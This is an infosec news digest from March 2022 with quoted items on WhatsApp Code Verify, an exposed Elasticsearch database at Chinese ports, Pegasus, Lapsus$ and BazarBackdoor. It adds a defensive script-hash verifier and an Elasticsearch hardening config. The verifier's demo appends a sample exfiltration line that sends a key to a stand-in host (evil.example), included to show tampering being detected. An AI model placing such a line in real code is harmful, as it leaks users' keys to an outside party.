InfoSec News 20220311

  • Published: Fri, 11/03/2022 - 10:53

Top News


  • Here's How to Find if WhatsApp Web Code on Your Browser Has Been Hacked

"Meta Platforms' WhatsApp and Cloudflare have banded together for a new initiative called Code Verify to validate the authenticity of the messaging service's web app on desktop computers."

Link

TLP¹: Green
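Code Verify works by hashing the JavaScript the browser actually loaded and comparing it against hashes that WhatsApp publishes to a third party (Cloudflare), so a script that was modified in transit, injected by a browser extension, or swapped on a compromised web server no longer matches. The script below is an added example, not the Code Verify extension's code or anything from Meta or Cloudflare: it implements the same check as a small hash-manifest verifier. The resource names and script bytes are constructed stand-ins for a real app's files.

```python
"""Hash-manifest check of the kind Code Verify performs: compare the bytes a
browser actually executed against hashes endorsed out-of-band.

Added example, not WhatsApp's or Cloudflare's code. The manifest format,
resource names and sample bytes below are constructed for illustration.
"""
import hashlib
import hmac
from typing import Dict, Mapping


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def verify_resources(manifest: Mapping[str, str],
                     loaded: Mapping[str, bytes]) -> Dict[str, str]:
    """Return a verdict per resource path.

    manifest: path -> expected sha256 hex, obtained from a party independent
              of the web server that delivered the code (the Cloudflare role).
    loaded:   path -> bytes the client actually executed.
    Verdicts: "ok", "mismatch" (bytes differ from the endorsed build),
              "unexpected" (script not in the manifest at all), "missing".
    """
    verdicts: Dict[str, str] = {}
    for path, expected in manifest.items():
        if path not in loaded:
            verdicts[path] = "missing"
            continue
        actual = sha256_hex(loaded[path])
        # compare_digest keeps the comparison constant-time, so timing does
        # not reveal how many leading hex characters matched.
        matched = hmac.compare_digest(actual, expected.lower())
        verdicts[path] = "ok" if matched else "mismatch"
    for path in loaded:
        if path not in manifest:
            verdicts[path] = "unexpected"
    return verdicts


def overall_status(verdicts: Mapping[str, str]) -> str:
    """Collapse per-file verdicts into one indicator, like the extension's
    traffic light: tampered or injected code -> "fail", an endorsed file the
    page never loaded -> "warn", everything matched -> "pass"."""
    values = list(verdicts.values())
    if any(v in ("mismatch", "unexpected") for v in values):
        return "fail"
    if "missing" in values:
        return "warn"
    return "pass"


# Constructed sample: the endorsed build as published, and its manifest.
ENDORSED_BUILD = {
    "app.js": b"console.log('chat client v1');",
    "crypto.js": b"export function encrypt(m, k) { /* ... */ }",
}
MANIFEST = {path: sha256_hex(data) for path, data in ENDORSED_BUILD.items()}


def demo_tampered() -> Dict[str, str]:
    """What the browser saw after a (constructed) tampering: an exfiltration
    line appended to crypto.js and an extra script injected into the page."""
    loaded = dict(ENDORSED_BUILD)
    loaded["crypto.js"] += b"\nfetch('https://evil.example/?k=' + k);"
    loaded["inject.js"] = b"/* injected by a compromised CDN or extension */"
    return verify_resources(MANIFEST, loaded)


if __name__ == "__main__":
    clean = verify_resources(MANIFEST, ENDORSED_BUILD)
    print(overall_status(clean), clean)
    tampered = demo_tampered()
    print(overall_status(tampered), tampered)
```

The independent-channel property is the whole point: if the manifest is fetched from the same origin as the scripts, an attacker who controls that origin rewrites both and every verdict is "ok". It also explains why the extension can only report a problem, not repair it; by the time the hash is computed the script has already been loaded.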

  • Open database leaves major Chinese ports exposed to shipping chaos

"The freight logs of two major Chinese shipping ports have been leaking data, a problem which if left unresolved could disrupt the supply chain of up to 70,000 tonnes of cargo a day, with potentially serious consequences for international shipping.
The cybernews® research team identified an open ElasticSearch database, which contained more than 243GB of data detailing current and historic ship positions that is exposed to the public. Analyzing the data, the team determined that it is highly likely to belong to the Yangtze river ports of Nanjing and Zhangjiagang."

Link

TLP¹: Green
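The exposure pattern behind findings like this one is almost always a node whose HTTP port is bound to a public interface with the security features switched off; Elasticsearch 7.x shipped with xpack.security.enabled defaulting to false, and releases before 8.0 did not enforce authentication unless it was turned on. The fragment below is an added example, not taken from the research team's report or from the affected ports: the first document shows the exposed settings, the second the hardened ones. The cluster name, addresses and keystore paths are assumptions.

```yaml
# elasticsearch.yml, exposed (Elasticsearch 7.x; names and addresses are assumed)
cluster.name: port-logistics
network.host: 0.0.0.0            # listens on every interface, including a public one
http.port: 9200
xpack.security.enabled: false    # no authentication: anyone reaching :9200 can read, alter or delete every index
---
# elasticsearch.yml, corrected
cluster.name: port-logistics
network.host: 10.20.0.5          # private interface only (assumed); reach it via VPN or an authenticated reverse proxy
http.port: 9200
xpack.security.enabled: true     # authentication and role-based access control enforced
xpack.security.http.ssl.enabled: true
xpack.security.http.ssl.keystore.path: certs/http.p12                    # assumed path
xpack.security.transport.ssl.enabled: true
xpack.security.transport.ssl.verification_mode: certificate
xpack.security.transport.ssl.keystore.path: certs/elastic-certificates.p12   # assumed path
xpack.security.transport.ssl.truststore.path: certs/elastic-certificates.p12
```

A quick external check from outside the network is `curl -s http://<host>:9200/_cat/indices?v`: if it returns the index list without credentials, the data is open to anyone who finds the port, which is what the research team did here. With security enabled the same request returns 401. Binding to a private address is not a substitute for enabling security; cloud security groups and port forwards change, and an unauthenticated node behind them is one misconfiguration away from this headline.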

  • EU Lawmakers to Probe 'Political' Pegasus Spyware Use

"The European Parliament on Thursday created a "committee of inquiry" to probe accusations over the use of Pegasus spyware by governments in the bloc, notably in Hungary and Poland.
Lawmakers voted overwhelmingly to "investigate alleged breaches of EU law in the use of the surveillance software by, among others, Hungary and Poland", a statement said.
The 38-member committee "is going to look into existing national laws regulating surveillance, and whether Pegasus spyware was used for political purposes against, for example, journalists, politicians and lawyers", it said."

Link

TLP¹: Green

Cybersecurity State: Surveillance, Cyberwarfare, Cybercriminality and Hacktivism


  • Russia Pushing New State-run TLS Certificate Authority to Deal With Sanctions

"The Russian government has established its own TLS certificate authority (CA) to address issues with accessing websites that have arisen in the wake of sanctions imposed by the west following the country's unprovoked military invasion of Ukraine."

Link

TLP¹: Green

  • Iranian Hackers Targeting Turkey and Arabian Peninsula in New Malware Campaign

"The Iranian state-sponsored threat actor known as MuddyWater has been attributed to a new swarm of attacks targeting Turkey and the Arabian Peninsula with the goal of deploying remote access trojans (RATs) on compromised systems."

Link

TLP¹: Green

  • Lapsus$ Ransomware gang is looking for insiders willing to sell remote access to major technology corporations and ISPs.

"Lapsus$ ransomware gang announced they’re starting to recruit insiders employed within major technology giants and ISPs; such companies include Microsoft, Apple, EA Games and IBM. Their scope of interests includes major telecommunications companies such as Claro, Telefonica and AT&T."

Link

TLP¹: Green

  • Canadian NetWalker Ransomware Operator Extradited to U.S.

"A former Canadian government employee has been extradited to the United States to face charges related to dozens of NetWalker ransomware attacks.
Charges against the individual – Sebastien Vachon-Desjardins, 34, of Gatineau, Quebec, Canada – were announced last year, when law enforcement authorities in the U.S. and Europe seized the dark web sites used in the NetWalker ransomware operations.
Offered under the ransomware-as-a-service (RaaS) business model, NetWalker – also known as Mailto – emerged in 2019 and has been involved in a variety of high-profile attacks, including ones targeting education, government, health, and public transportation organizations."

Link

TLP¹: Green

  • Malware Posing as Russia DDoS Tool Bites Pro-Ukraine Hackers

"Be careful when downloading a tool to cyber-target Russia: It could be an infostealer wolf dressed in sheep’s clothing that grabs your cryptocurrency info instead.
Looking to cyber-hassle Russia, Ukrainian sympathizers? Be careful — malware is making the rounds, disguised as a pro-Ukraine cyber-tool that will turn around and bite you instead, researchers are warning.
In a Wednesday threat advisory, Cisco Talos described a campaign it’s observed in which a threat actor was offering a supposed distributed denial-of-service (DDoS) tool on Telegram, that’s purportedly meant to pummel Russian websites.
In truth, the file is actually the Phoenix infostealer that’s after credentials and cryptocurrency info, according to researchers."

Link

TLP¹: Green

Breaches: Data Breaches and Hacks


  • UK ferry operator Wightlink flags potential data breach after ‘highly sophisticated’ cyber-attack

"UK ferry operator Wightlink has been hit by a “highly sophisticated” cyber-attack that may have compromised personal data belonging to “a small number of customers and staff”.
Wightlink says the attack, which happened in February, affected certain back-office IT systems but not its ferry services, booking system, or website.
Law enforcement and the UK’s Information Commissioner’s Office (ICO) have been notified along with potential breach victims, added the company."

Link

TLP¹: Green

Vulnerabilities: Vulnerability Advisories, Zero-Days, Patches and Exploits


  • Microsoft praised for quickly resolving Azure Automation cloud security vulnerability

"Microsoft has fixed a critical vulnerability in its Azure Automation service that could have allowed a cloud tenant to take full control over resources and data belonging to other customers.
Microsoft Azure Automation is designed to allow customers to schedule jobs, handle input and output, and more, with each customer’s automation code running inside a sandbox, isolated from other customers’ code executing on the same virtual machine.
However, a vulnerability – discovered by Orca Security and dubbed 'AutoWarp' – shattered the sanctity of this virtualized environment."

Link

TLP¹: Green

  • High-Severity Vulnerabilities Patched in Omron PLC Programming Software

"Several high-severity vulnerabilities that can be exploited for remote code execution were patched recently in the CX-Programmer software of Japanese electronics giant Omron.
An advisory released earlier this month by Japan’s JPCERT/CC revealed that the product is affected by five use-after-free and out-of-bounds vulnerabilities, all with a CVSS score of 7.8."

Link

TLP¹: Green

Incident Response: Infrastructure, Training, SIEM and Incident Handling


  • SEC Proposes Four-Day Breach Notification Rules

"The US Securities and Exchange Commission (SEC) has proposed new rules designed to increase transparency around cybersecurity incident reporting.
The regulator wants listed companies to disclose a “material cybersecurity incident” within four business days of discovery. Although all states have laws forcing businesses to disclose data breaches, they typically don’t extend to incidents where personal information isn’t taken.
SEC chair, Gary Gensler, said the regulator’s disclosure regime needed to change to reflect evolving risk and investor needs."

Link

TLP¹: Green

  • Security Teams Prep Too Slowly for Cyberattacks

"Attackers typically take days or weeks to exploit new vulnerabilities, but defenders are slow to learn about critical issues and take action, requiring 96 days on average to learn to identify and block current cyber threats, according to a new report analyzing training and crisis scenarios.
The report, Cyber Workforce Benchmark 2022, found that cybersecurity professionals are much more likely to focus on vulnerabilities that have garnered media attention, such as Log4j, than more understated issues, and that different industries develop their security capabilities at widely different rates."

Link

TLP¹: Green

Technical Articles: Forensics, Reverse Engineering, Malware, Phishing, Pentesting, Software Security and Cryptography


  • Corporate website contact forms used to spread BazarBackdoor malware

"The stealthy BazarBackdoor malware is now being spread via website contact forms rather than typical phishing emails to evade detection by security software.
BazarBackdoor is a stealthy backdoor malware created by the TrickBot group and is now under development by the Conti ransomware operation. This malware provides threat actors remote access to an internal device that can be used as a launchpad for further lateral movement within a network.
The BazarBackdoor malware is usually spread through phishing emails that include malicious documents that download and install the malware. "

Link

TLP¹: Green

  • Microsoft confirms Intune enrollment issue on Android devices

"Microsoft has confirmed a new known issue causing Microsoft Intune enrollment problems on some Android devices after upgrading from Android 11 to Android 12.
Customers impacted by this issue have also reported losing access to Microsoft Intune-managed resources after the upgrade process ends.
"Currently, this includes some OPPO, OnePlus, and Realme devices enrolled as Android Enterprise personally-owned work profile," the Intune Support Team explained."

Link

TLP¹: Green

¹ Traffic Light Protocol (TLP) [1] for information sharing:

  • Red: Not for disclosure, restricted to participants only.
  • Amber: Limited disclosure, restricted to participants' organizations.
  • Green: Limited disclosure, restricted to the community.

 


[1] https://www.first.org/tlp